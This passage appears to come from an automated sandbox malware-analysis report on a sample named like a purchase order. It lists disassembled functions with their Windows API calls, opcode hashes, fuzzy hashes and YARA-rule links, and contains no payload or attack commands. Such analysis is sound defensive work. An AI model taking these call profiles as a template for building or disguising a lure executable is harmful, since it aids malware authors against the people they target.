                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                              • String ID:
                                                                                                              • API String ID: 2169480361-0
                                                                                                              • Opcode ID: 273d67568b3fa8693b93e29bf80d1440f329b2100dafc511943cc6dd0fb00f49
                                                                                                              • Instruction ID: 4ab5c202f37a91538b117be63e85a7443fb7ee502950b893dd92eb201ea9b9cd
                                                                                                              • Opcode Fuzzy Hash: 273d67568b3fa8693b93e29bf80d1440f329b2100dafc511943cc6dd0fb00f49
                                                                                                              • Instruction Fuzzy Hash: 5411EE31741520AFEB05AB28CC05FBE7798AF85320F14421AF916DB2E1DFB4AC008799
                                                                                                              Function 00420AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00421E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00420ABB,?,?,?,0042187A,00000000,000000EF,00000119,?,?), ref: 00421E77
                                                                                                                • Part of subcall function 00421E68: lstrcpyW.KERNEL32(00000000,?,?,00420ABB,?,?,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00421E9D
                                                                                                                • Part of subcall function 00421E68: lstrcmpiW.KERNEL32(00000000,?,00420ABB,?,?,?,0042187A,00000000,000000EF,00000119,?,?), ref: 00421ECE
                                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00420AD4
                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00420AFA
                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00420B2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                              • String ID: cdecl
                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                              • Opcode ID: f74792fbc6f857df7ea303506b182f35c0879dd219db8c59c05d4ff5bb80c547
                                                                                                              • Instruction ID: cfcaa7061dd120ff46fc67bf42f410027a9b507da3c92f9edc9563fe7f84674a
                                                                                                              • Opcode Fuzzy Hash: f74792fbc6f857df7ea303506b182f35c0879dd219db8c59c05d4ff5bb80c547
                                                                                                              • Instruction Fuzzy Hash: 4C11B436700315AFDB259F64EC05E7A7BA8FF49354B80416BE805CB251EB75E840C7A5
                                                                                                              Function 00412F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00412FB5
                                                                                                                • Part of subcall function 0040395C: __FF_MSGBANNER.LIBCMT ref: 00403973
                                                                                                                • Part of subcall function 0040395C: __NMSG_WRITE.LIBCMT ref: 0040397A
                                                                                                                • Part of subcall function 0040395C: RtlAllocateHeap.NTDLL(00D30000,00000000,00000001,00000001,00000000,?,?,003FF507,?,0000000E), ref: 0040399F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 614378929-0
                                                                                                              • Opcode ID: 189eead7d7c7ae7eed72af89f38d10c6b6fb49d4f33953477b24ae4707273278
                                                                                                              • Instruction ID: 646cd4d30ae140a0ddc015f120d699ff0436103d520498920faf855681a5e590
                                                                                                              • Opcode Fuzzy Hash: 189eead7d7c7ae7eed72af89f38d10c6b6fb49d4f33953477b24ae4707273278
                                                                                                              • Instruction Fuzzy Hash: E711EE319082119BDB213F719C0469B3F94AF04365F10443FF849E62A1DB7CC9D1969E
                                                                                                              Function 003FEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 003FEBB2
                                                                                                                • Part of subcall function 003E51AF: _memset.LIBCMT ref: 003E522F
                                                                                                                • Part of subcall function 003E51AF: _wcscpy.LIBCMT ref: 003E5283
                                                                                                                • Part of subcall function 003E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003E5293
                                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 003FEC07
                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003FEC16
                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00453C88
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378193009-0
                                                                                                              • Opcode ID: 1d82717f470cb05201464008d32da46d7380a111afc2bd3143f7ac28effc9cec
                                                                                                              • Instruction ID: 96c214454cad899d522674900d61c02a2ab5147127d39f390cc697fb846e86f2
                                                                                                              • Opcode Fuzzy Hash: 1d82717f470cb05201464008d32da46d7380a111afc2bd3143f7ac28effc9cec
                                                                                                              • Instruction Fuzzy Hash: CF21FC719047949FE7339B28C855BE7BFEC9B05309F04049EE78E56292C7B42A84CB56
                                                                                                              Function 0042058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004205AC
                                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004205C7
                                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004205DD
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00420632
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                              • String ID:
                                                                                                              • API String ID: 3137044355-0
                                                                                                              • Opcode ID: ed6826d488ba2908da9210070b633d99bb56edd2e8120e5f69dc367350ac03cc
                                                                                                              • Instruction ID: 055528facf61df5bf1a010bb195613e5f0a8c5d178ce1de46823aebe7eb593f4
                                                                                                              • Opcode Fuzzy Hash: ed6826d488ba2908da9210070b633d99bb56edd2e8120e5f69dc367350ac03cc
                                                                                                              • Instruction Fuzzy Hash: D621A271B00228EFDB20CF91EC88ADABBF8EF40704F40846EE51692111DBB9EA55DF55
                                                                                                              Function 00426713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00426733
                                                                                                              • _memset.LIBCMT ref: 00426754
                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004267A6
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004267AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1157408455-0
                                                                                                              • Opcode ID: 5bb8e1ff8d46ed575816ee31f1b74a1d2eb6bb8698a9f34bd5ff741b49d03bb9
                                                                                                              • Instruction ID: e68fe1c351dce33cc1cb96bd88a96f4fc17a192142564ad0b980d423464f106b
                                                                                                              • Opcode Fuzzy Hash: 5bb8e1ff8d46ed575816ee31f1b74a1d2eb6bb8698a9f34bd5ff741b49d03bb9
                                                                                                              • Instruction Fuzzy Hash: D411A775E012287AE72057A5AC4DFABBABCEF44764F1141AAF904E71D0D2744E808B79
                                                                                                              Function 0041B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0041AA79
                                                                                                                • Part of subcall function 0041AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0041AA83
                                                                                                                • Part of subcall function 0041AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0041AA92
                                                                                                                • Part of subcall function 0041AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0041AA99
                                                                                                                • Part of subcall function 0041AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0041AAAF
                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,0041ADE4,?,?), ref: 0041B21B
                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0041B227
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041B22E
                                                                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 0041B247
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                              • String ID:
                                                                                                              • API String ID: 4217664535-0
                                                                                                              • Opcode ID: 1d18bc6b1f2407fa037cc090d801527b670f07e1145c62b791f248f3cdffc90b
                                                                                                              • Instruction ID: d8c224abab67a43ea5faadf2a76f011749e8120239620f2c76e186b715bd1a43
                                                                                                              • Opcode Fuzzy Hash: 1d18bc6b1f2407fa037cc090d801527b670f07e1145c62b791f248f3cdffc90b
                                                                                                              • Instruction Fuzzy Hash: F2118F71A00205AFDB049F94DD89AEFB7A9EF85308F14806EE94297210D779AE88CB54
                                                                                                              Function 0041B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0041B498
                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041B4AA
                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041B4C0
                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041B4DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 32482a4c06d8e8dbf6e6b68ce16cedd39d0c7a4640fcbed33419e27bd3cfcd53
                                                                                                              • Instruction ID: dd9d298406222b7a56e8efccffd1553035dfb86a307571dc00dedd605a809c35
                                                                                                              • Opcode Fuzzy Hash: 32482a4c06d8e8dbf6e6b68ce16cedd39d0c7a4640fcbed33419e27bd3cfcd53
                                                                                                              • Instruction Fuzzy Hash: 4F11367AA00218BFDB11DBA9C981EDDBBB4FB08700F208096E604A7290D771AE51DB94
                                                                                                              Function 003FB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003FB5A5
                                                                                                              • GetClientRect.USER32(?,?), ref: 0045E69A
                                                                                                              • GetCursorPos.USER32(?), ref: 0045E6A4
                                                                                                              • ScreenToClient.USER32(?,?), ref: 0045E6AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 4127811313-0
                                                                                                              • Opcode ID: c521f2fe9a6f835b31c5643bc8eb73db8b21571c74fc4434f11b505ab62a410b
                                                                                                              • Instruction ID: 0c0efbd39ff57d717d4331446155782375683bd99dc2515a6e7d32f9c4744314
                                                                                                              • Opcode Fuzzy Hash: c521f2fe9a6f835b31c5643bc8eb73db8b21571c74fc4434f11b505ab62a410b
                                                                                                              • Instruction Fuzzy Hash: BA113A71A00029BBCF15DF54CC458BEB7B8EB09305F400466EA46E7151D778AA95CBA9
                                                                                                              Function 0042732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00427352
                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00427385
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0042739B
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004273A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2880819207-0
                                                                                                              • Opcode ID: 320c777a165c9dd1a0eacb64572073e0048cf76c336f6248bcc9dfbbbb790a12
                                                                                                              • Instruction ID: c1f7cecc2657fd2295fb28eb259febb39c08b810fc65ffded7a80f4d81647680
                                                                                                              • Opcode Fuzzy Hash: 320c777a165c9dd1a0eacb64572073e0048cf76c336f6248bcc9dfbbbb790a12
                                                                                                              • Instruction Fuzzy Hash: 3911E572F04214ABC701DF68EC05B9E7FA99B45311F144266FC21D3291E6B4891097A9
                                                                                                              Function 003FD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
                                                                                                              • GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3970641297-0
                                                                                                              • Opcode ID: 8a88c0c8cf68455ab3bb1137e2fa318df22e50c64f74d465f197050d979f3426
                                                                                                              • Instruction ID: 16979ff9c875be503039537f3dddd2a75a039b451eea881597444f797a138a93
                                                                                                              • Opcode Fuzzy Hash: 8a88c0c8cf68455ab3bb1137e2fa318df22e50c64f74d465f197050d979f3426
                                                                                                              • Instruction Fuzzy Hash: 1D11A1B290150DBFEB024F90DC54EFA7B6EFF09365F050215FB0552050D7759D60ABA1
                                                                                                              Function 00414DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                              • Instruction ID: 2e385358546670407d5896770ecbc45af3ae9a36e7209086c9e0bcc922aa9f7d
                                                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                              • Instruction Fuzzy Hash: CC01403600024EFBCF125E84DC01CEE3F23BB58355B588556FE2859135D33ADAB2AB89
                                                                                                              Function 00407452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00407A0D: __getptd_noexit.LIBCMT ref: 00407A0E
                                                                                                              • __lock.LIBCMT ref: 0040748F
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004074AC
                                                                                                              • _free.LIBCMT ref: 004074BF
                                                                                                              • InterlockedIncrement.KERNEL32(00D415F0), ref: 004074D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2704283638-0
                                                                                                              • Opcode ID: 0b9218f4405262d7853dfd4762114c90bb4a57dfe4c040d820bac2091a20ef57
                                                                                                              • Instruction ID: 12b396ed7070e500eb6c543db103989cc92d805a6857a2a32c136f652067d9db
                                                                                                              • Opcode Fuzzy Hash: 0b9218f4405262d7853dfd4762114c90bb4a57dfe4c040d820bac2091a20ef57
                                                                                                              • Instruction Fuzzy Hash: 38017932E09621ABDB22AF66940975EBB60AB04714F15413BE815777D0CB3C7961CECF
                                                                                                              Function 0044EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003FAFE3
                                                                                                                • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FAFF2
                                                                                                                • Part of subcall function 003FAF83: BeginPath.GDI32(?), ref: 003FB009
                                                                                                                • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FB033
                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0044EA8E
                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 0044EA9B
                                                                                                              • EndPath.GDI32(00000000), ref: 0044EAAB
                                                                                                              • StrokePath.GDI32(00000000), ref: 0044EAB9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                              • String ID:
                                                                                                              • API String ID: 1539411459-0
                                                                                                              • Opcode ID: d384619c87fa1925643a78d77b320bbb0c202f76a4e3132cbf64017dbdce6589
                                                                                                              • Instruction ID: baeb3df66a23972ce2d006489d14a5f882705ca31242bf7dbe036d573e78a9c6
                                                                                                              • Opcode Fuzzy Hash: d384619c87fa1925643a78d77b320bbb0c202f76a4e3132cbf64017dbdce6589
                                                                                                              • Instruction Fuzzy Hash: 12F05E31905259BBEB129F94AD09FCE3F19AF0A315F084112FA11651E187B85561CB9E
                                                                                                              Function 0041C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0041C84A
